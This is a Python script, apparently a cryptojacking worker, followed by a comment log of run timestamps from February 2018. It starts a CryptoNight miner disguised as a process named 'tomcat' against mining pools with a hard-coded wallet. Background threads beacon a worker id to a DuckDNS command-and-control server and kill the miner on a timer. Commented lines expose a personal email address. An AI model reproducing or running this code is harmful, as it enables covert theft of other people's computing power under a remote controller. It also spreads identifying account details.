import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:17:07.353878
#2018-02-17 16:05:03.798897
#2018-02-17 17:52:05.786421
#2018-02-17 19:41:06.207812
#2018-02-17 21:29:03.737657
#2018-02-17 23:13:05.107211
#2018-02-18 01:00:01.895308
#2018-02-18 02:48:06.531724
#2018-02-18 04:37:06.851677
#2018-02-18 06:28:07.141016
#2018-02-18 08:18:07.210720
#2018-02-18 10:06:05.690835
#2018-02-18 11:52:06.756535
#2018-02-18 13:38:06.478738
#2018-02-18 15:28:07.393902
#2018-02-18 17:17:06.863760
#2018-02-18 19:06:08.078775
#2018-02-18 20:51:07.198741
#2018-02-18 22:38:05.097233
#2018-02-19 00:27:01.273456
#2018-02-19 02:12:01.468029
#2018-02-19 03:58:06.559226
#2018-02-19 05:43:01.268119
#2018-02-19 07:31:06.335174
#2018-02-19 09:21:06.482719
#2018-02-19 11:10:09.439695
#2018-02-19 12:57:05.318466
#2018-02-19 14:46:09.327310
#2018-02-19 16:35:10.935567
#2018-02-19 18:23:05.879844
#2018-02-19 20:08:09.306618
#2018-02-19 21:59:05.942161
#2018-02-19 23:44:06.972983
#2018-02-20 01:32:03.785384
#2018-02-20 03:21:04.220611
#2018-02-20 05:07:07.042551
#2018-02-20 06:51:04.323236
#2018-02-20 08:37:01.618141
#2018-02-20 10:21:07.724339
#2018-02-20 12:07:05.489017
#2018-02-20 13:53:06.973652
#2018-02-20 15:37:01.828190
#2018-02-20 17:22:06.571465
#2018-02-20 19:11:01.403123
#2018-02-20 21:00:07.082492
#2018-02-20 22:46:07.669602
#2018-02-21 00:31:04.734413
#2018-02-21 02:18:06.090443
#2018-02-21 04:07:03.550318
#2018-02-21 05:54:04.123417
#2018-02-21 07:42:07.586834
#2018-02-21 09:27:07.971862
#2018-02-21 11:16:06.332304
#2018-02-21 13:06:02.144433
#2018-02-21 14:53:06.122563
#2018-02-21 16:41:09.868246
#2018-02-21 18:31:05.764688
#2018-02-21 20:16:06.049686
#2018-02-21 22:04:04.939802
#2018-02-21 23:50:09.543049
#2018-02-22 01:42:05.244104
#2018-02-22 03:30:10.335764
#2018-02-22 05:17:03.965524
#2018-02-22 07:08:01.978296
#2018-02-22 08:54:06.661727
#2018-02-22 10:42:07.126635
#2018-02-22 12:30:07.933802
#2018-02-22 14:14:09.432453
#2018-02-22 16:03:11.161739
#2018-02-22 17:50:10.600106
#2018-02-22 19:39:02.140046
#2018-02-22 21:31:07.503090
#2018-02-22 23:18:06.600814
#2018-02-23 01:04:01.462027
#2018-02-23 02:51:03.749225
#2018-02-23 04:38:06.465876
#2018-02-23 06:24:08.271335
#2018-02-23 08:10:09.105182
#2018-02-23 10:27:03.378024
#2018-02-23 12:20:02.930110
#2018-02-23 14:09:02.058573
#2018-02-23 15:59:06.382664
#2018-02-23 17:44:04.650991
#2018-02-23 19:32:01.241128
#2018-02-23 21:15:10.116612
#2018-02-23 23:03:05.345577
#2018-02-24 00:54:07.536967
#2018-02-24 02:49:07.359115
#2018-02-24 04:38:06.376920
#2018-02-24 06:22:06.279186
#2018-02-24 08:10:01.606025
#2018-02-24 09:53:06.708756
#2018-02-24 11:48:01.475750
#2018-02-24 13:39:06.277111
#2018-02-24 15:27:05.419557
#2018-02-24 17:17:04.641650
#2018-02-24 19:08:07.198920
#2018-02-24 20:57:04.460306
#2018-02-24 23:25:07.697318
#2018-02-25 03:36:07.450279
#2018-02-25 07:14:04.086965